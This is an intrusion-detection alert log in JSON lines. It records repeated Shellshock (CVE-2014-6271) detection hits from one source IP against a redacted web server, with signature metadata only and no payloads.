{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}}